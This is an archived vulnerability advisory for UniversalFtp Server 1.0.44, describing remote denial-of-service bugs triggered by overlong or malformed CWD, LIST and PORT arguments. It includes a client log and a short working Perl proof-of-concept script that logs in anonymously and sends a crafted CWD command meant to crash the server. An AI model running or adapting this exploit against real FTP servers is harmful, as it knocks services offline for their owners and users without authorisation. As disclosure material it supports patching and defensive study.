UniversalFtp Server 1.0.44 Multiple Remote Denial of service

Type securityvulns
Reporter Securityvulns
Modified 2008-02-16T00:00:00


UniversalFtp Server 1.0.44 Multiple Remote #Denial of service

@nolife : This bug has been found with a brain , ten fingers, a keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools hint .

Reponse: 226 Completed...

Statut: Liste du repertoire completee

Commande : LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...... ......... ...........

Reponse: 150 Directory...

Statut: ftpcontrolsocket.cpp(1764): Waiting for replies to skip before sending next command... caller=0p12e69f8 --> 0_o

functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A)

PoC :

use Net::FTP; (($target = $ARGV[0])) || die "usage:$0 <target> <port>"; my $user = "anonymous"; my $pass = "something"; print "Trying to connect to :$target...\n"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect"; print "Connected!\n"; $ftp->login($user, $pass); $ftp->cwd("AA"); print "Poc Successfull the server should down now \n"; $ftp->quit;